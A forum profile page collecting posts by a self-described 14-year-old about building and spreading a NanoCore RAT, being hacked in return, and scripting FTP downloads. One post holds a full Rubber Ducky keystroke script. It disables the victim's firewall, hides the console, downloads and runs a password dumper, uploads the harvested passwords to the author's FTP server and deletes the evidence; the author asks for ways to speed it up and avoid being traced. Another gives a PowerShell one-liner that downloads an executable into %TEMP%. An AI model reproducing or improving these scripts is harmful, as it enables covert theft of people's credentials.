contrix_
-
Posts
18 -
Joined
-
Last visited
Posts posted by contrix_
-
-
So this is basically an update to my post here:
I didn't know how the person got my RAT in the first place and how they got onto my computer. Now I know that it wasn't someone that got into my Computer because of the cracked version of the Rat-Program - even though there was a silent monero miner in it - but it was someone that got my file from VirusTotal. It's a site where you can scan files and see which out of like 50 antiviruses detect it. I didn't know that they distribute the files and that you can straightly DOWNLOAD them from the site. So someone was probably running a bot on a Virtual Machine, that downloads all files that get flagged as a rat by the antivirus programs on VirusTotal and download them. I remember that I once saw a video on YouTube where someone was able to get into the machine of someone that tried to RAT him by using the file of that person.
So is there a way that someone used my file to get into my computer? What are they able to do with it?
Thanks for any answers ;)
PS: From now on, if I have to use a online virus scanner, I'm using nodistribute ^^
-
15 hours ago, Dave-ee Jones said:
Theoretically he could've been running any Windows, but from the description it sounds like 98. Was Wireshark actually running or did you just see the icon on the desktop? Either way, worst case scenario is he's a hacker that was trying to hack you. 'Best' case scenario is he was curious and wanted to try out something.
Not sure what 'found' and 'terminated' could relate to, could be the connection, but I don't think it would say 'found' if a connection between you and him was seen. Terminated was probably when (or just before) you were cut off if that's the case.
A command prompt running a Python script with the name 'clock' is a bit weird, though. Not sure there, could be anything. Not sure why he would name it clock..
No, Wireshark was not running or at least I didn't see it.
14 hours ago, i8igmac said:What ports are used, when a target machine runs the trojin, does it connect back to your machine? If so then you would have configured port forwarding? What port if this?
You should monitor this port, its possible random traffic hit your open port but also possible your tool is a backdoor. hackforum is full of bs tools.
I may have misunderstood what you see. A vnc session? Maybe some one ran your trojin from a vm.
6I don't know the port anymore because I deleted it. It was probably a VM, I think the Display measures I saw in nanocore were 800x800 and I used a VM that had these quarter windows once
Update:
Last night I left my computer on due to Ethereum mining and had 1 browser window open. When I got up and looked at my screen, the browser window was closed and I was on my Steam Account Page where I can see my Payment Methods and all that stuff. I didn't have that much time because I had to go to school, but in the browser history were some new listings, and I only saw the first. It was a sellfy (or something similar) website where someone had a website that was someone like "crackpw" and sold something for 20 Euros. I bet those where my passwords or a connection to my pc. I also had an email from Coinbase (you can buy bitcoins there) that someone logged in from MY IP, but the Account was empty and without any payment methods anyways. After school, I changed the most of my passwords but I wasn't able to log into my second PayPal Account because the password was changed and the telephone number was also changed, so they had access to my email, too. I can't send a ticket to PayPal about that because I used false names and streets (no not a fake id) but there were only a few dollars on it.
I didn't notice anything else. I'm going to start my computer without Internet, save some important files that I know are 100% not infected on an external drive and gonna reset my whole computer completely.
Or can I track where the RAT is installed and delete somehow?
Thanks for your answers, I hope you will take your time again to answer me ;)
contrix_
-
Sorry I didn't know that. I think the problem was that I opened the UDP and TCP Ports without any security.
-
Hello,
something really weird happened to me yesterday. I created a RAT that I encrypted in a WinRar File and wanted to troll some of my friends with. I send the file in the chat of my discord server (similar to Teamspeak) and before that tested it on virustotal.com and a similar site. No one downloaded it (unfortunately ^^), but a few hours later (when none of the people that were on the discord were online) anymore, I saw a connection coming in. I used a cracked version of NanoCore that I got from some hacking forum (it was created by Alcatraz3222 and thousands of people downloaded it). The Computer had an IP from the USA (doesn't have to be true, it show that I'm from England even tho I have a German IP) and had no Antivirus installed. The name of it was something with a C at the beginning, and a y and an o (don't remember it exactly). I wanted to know who that was and opened the windows to the screen. He had some old version of Windows installed which I didn't know (its the one with the gray taskbar, pretty basic). There was a command prompt running, which had a python logo and was named "clock". I don't remember what was in it, but it was testing for something the whole time and once said something about "found" and "terminated". The only other thing I saw was Wireshark on the desktop. A few seconds after that, he disappeared from my client list. I didn't use any protection like VPN or a firewall at that moment.
After that, I got really scared for some reason and turned off my computer. Does someone know how he got on my list and what he was doing? Maybe I'm getting ratted and he wanted to see what that file was, or a discord server ran the file?
I really need your help ;)
Cheers,
contrix_
PS: Sry for my bad English, I'm German and just 14 years old as you probably already assumed by my writing ^^
PPS: While writing this text I overwrote my text two times, even tho I don't think I touched the insert button. I'm getting really paranoid xD
-
Hello,
I wanted to download files via CMD, and the first way I discovered was FTP. I rent a server and everything worked. The problem is that it takes kinda long to type in the credentials. After some research I found this PowerShell line:
powershell (new-object System.Net.WebClient).DownloadFile('http://website.com/file.exe','%TEMP%\file.exe')But I have some questions:
-
What is the part after %TEMP% for? Is that the destination where the files "arrives"? So if i wanted to download it to C:\, I just have to change it to C:\, right? - Where can I host the file for free? I found some web server hosting sites, but the only databases I was able to find were FTP and MySQL.
Thank you for your help ;)
-
-
yes, pls. i like it :D
-
At first: I´m sorry for my bad English, I´m only 14 and german ^^
So I just wrote this Rubber Ducky Script that downloads a .exe and a .bat from my FTP Server. Then it executes the .exe with the .bat file what creates a .txt file with all the passwords of the victim (of course me when I forgot my passwords :P). Then it deletes the .exe and .bat and uploads the .txt back to my server (it gets deleted after that, too.).
Here´s the script:
DELAY 1000 REM REM start cmd REM REM GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 STRING Alt j DELAY 1000 REM REM REM disable firewall REM REM STRING netsh advfirewall set currentprofile state off ENTER DELAY 500 REM color unreadable REM STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM REM REM download FTP REM STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 500 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET i.exe ENTER DELAY 8000 STRING lcd C:\ ENTER DELAY 100 STRING binary ENTER DELAY 100 STRING GET r.bat ENTER DELAY 800 STRING by ENTER DELAY 500 REM REM REM PASSWORD STEAL REM REM REM STRING cd C:\ ENTER DELAY 500 STRING r.bat ENTER DELAY 10000 STRING del r.bat ENTER DELAY 500 STRING del i.exe ENTER REM REM REM REM UPLOAD REM REM REM REM DELAY 500 STRING ftp myftpserver.com ENTER DELAY 1000 STRING username ENTER DELAY 1000 STRING password ENTER DELAY 1000 STRING lcd c:\ ENTER DELAY 100 STRING ascii ENTER DELAY 100 DELAY 800 STRING put p.txt ENTER DELAY 500 STRING bye ENTER DELAY 300 STRING del c:\p.txt ENTER DELAY 200 STRING netsh advfirewall set currentprofile state on ENTERI´m right now working on decreasing the delays, but the download and upload delays are hard to time because it obviously depends on the internet speed the victim has.
My ideas to improve this script:
Leave the first FTP windows open so I don´t need to log in again(Cons: 1.I could get thrown out of the session after some time 2. I probably wouldn´t be able to switch with ALT + TAB because I don´t what other windows the victims has open)
My question:
Does this leave something like a log file? So that the victim could trace me back? If so, where would it be located?
Do you guys have some suggestions? I would love to hear them :D
Disclaimer: I can´t put the .exe on my Rubber Ducky using the Twin Duck method because I am using the MalDuino from Seytonic (basically cheap RubberDucky) which cannot be used as a Twin Duck.
Thanks for your answers,
contrix_
Edit:
This is the batchfile:
i /stext p.txtDisclaimer 2: Everything works fine without any problems.
-
SOLVED. The problem was that I didn´t activate the binary mode in the FTP Client. But thanks for your help anyways ;)
-
At first: Sorry for my bad English, I´m german and only 14 years old.
I upload an .exe file from my computer to my FTP Server with the FTP.exe(cmd). Before I did that it was working just fine. But after I downloaded it, it comes up with the following error: "The file is not compatible with your computer." Before that, it came up with another error, something like "not compatible with a 64 Bit System.
I accidently asked the question on StackOverflow 2 hours ago, and some people answered that I have to active binary mode. When I do that with the "binary" command, I get an answer that the activation was successful, but it isn´t working anyways. The .exe looks identical after download, but instead of having the old icon it shows up the standard .exe icon. I do not want to use another FTP program like FileZilla or ncftp (I tried it with FileZilla, it isn´t working either, so I don´t think, that FTP.exe is the problem here.
The commands I used + Output(maybe the translation isn´t correct, but I think you know what the output meant):
C:\WINDOWS\system32>ftp myftpserver.com Connection to icarus.bplaced.net established. 220 Welcome to myftpserver.com, FTP server standing by ... 504 Unknown command User (myftpserver.com:(none)): user 331 Hello user, your FTP account password is required: password: password 230-Login successful, your current directory is / 230 34349 Kbytes used (3%) - authorized: 1048576 Kb ftp> binary 200 TYPE is now 8-bit binary ftp> get example.exe 200 PORT command successful 150-Connecting to port 61051 150 347.5 kbytes to download 226-File successfully transferred 226 1.648 seconds (measured here), 210.83 Kbytes per second FTP: 355794 bytes received in 1.91 seconds 186.38KB/s ftp>
Thanks and greetings, c0ntriX
Edit: I´m owning a 64-Bit System.
-
I tried the pasv, it didn´t work. The script is a PowerShell code. But do you know what I have to insert in "????"? It was originally "FTP_Folder". Maybe it´s the target folder on the FTP Server? It it would be the root folder, I would just have to type in "/", right? The folder "files" is empty when I inserted "/".
-
So I just tried a script from the StackOverflow Site, but when I execute it, nothing happens.
#FTP Server Information - SET VARIABLES $ftp = "myftpserver.com" $user = 'User' $pass = 'pass' $folder = '????' $target = "C:\Users\me\Desktop\files" #SET CREDENTIALS $credentials = new-object System.Net.NetworkCredential($user, $pass) function Get-FtpDir ($url,$credentials) { $request = [Net.WebRequest]::Create($url) $request.Method = [System.Net.WebRequestMethods+FTP]::ListDirectory if ($credentials) { $request.Credentials = $credentials } $response = $request.GetResponse() $reader = New-Object IO.StreamReader $response.GetResponseStream() while(-not $reader.EndOfStream) { $reader.ReadLine() } #$reader.ReadToEnd() $reader.Close() $response.Close() } #SET FOLDER PATH $folderPath= $ftp + "/" + $folder + "/" $files = Get-FTPDir -url $folderPath -credentials $credentials $files $webclient = New-Object System.Net.WebClient $webclient.Credentials = New-Object System.Net.NetworkCredential($user,$pass) $counter = 0 foreach ($file in ($files | where {$_ -like "*.exe"})){ $source=$folderPath + $fileI don´t know what to insert in $folder, the guy who made it just wrote "FTP_Folder". Is that the target folder on the FTP Server? It it would be the root folder, I would just have to type in "/", right? The folder "files" is empty when I inserted "/".
-
I tried the exact same as the guy in the video did. You can see the commands I used in my question. The problem with a 3rd party FTP client is, that the "victim" doesn´t have it installed. I put WinSCP(which is a 3rd party FTP client) on my server, but surprisingly I couldn´t download it. I´ll try that PowerShell thingy. Thanks for your effort tho.
-
Thank you for your answer. I tried everything you said, but it didn´t work. I just tried it on Linux with -p for passive mode and everything worked fine, so the passive mode is the problem.
Btw: I just remembered that I asked the question here because it had nothing to do with the Rubber Ducky. I only had the problem with the commands and had already a script from the Payloads site + Batch File, that used those commands.
But thanks for your answer anyways ;) Do you have any idea how I can solve that passive problem? Why and how can others download files from an FTP Server via CMD then?
-
What do you mean with "generic command"? Sorry, i am new to this and couldn´t find anything about it on Google.
-
Thank for this answer. I thought that the question belongs here because I didn´t find that many questions in the Rubber Ducky topic. I´ll try the suggestions you made ;)
-
I wanted to make a Rubber Ducky Script that uploads or downloads from my FTP Server.
I came up with these commands:
For downloading:
ftp -i ftpserver.com *typing in username and pass* get file.exe (yes the files is in the root folder)The login worked fine. On my first FTP Server, I got the Error message " Error 500 Unable to service PORT commands" . After some research, I found out, that the ftp.exe does not support passive mode (no, the pasv command didn´t work). For whatever reason, i tried it on my other servers. So I´m typing everything in again, and then I get the message "200 Port command successful" and a few seconds after that "425 Could not open data connection to port 65086: Connection timed out" (no, the server wasn´t down).
For uploading I used these commands:
ftp -i ftpserver.com *typing in username and pass* lcd C:\Users\myname\Desktop put myfile.exeWith this commands i get the same error as on Server 1 and 2.
Can anyone help me?
contrix_ ;)
Is there something like a "Revenge-Rat"
in Questions
Posted
I uploaded the file which would have granted me access if someone executed it.
I also considered doing it with a VM, but I would have to download all these virus scanners, which is the advantage oft online scanners.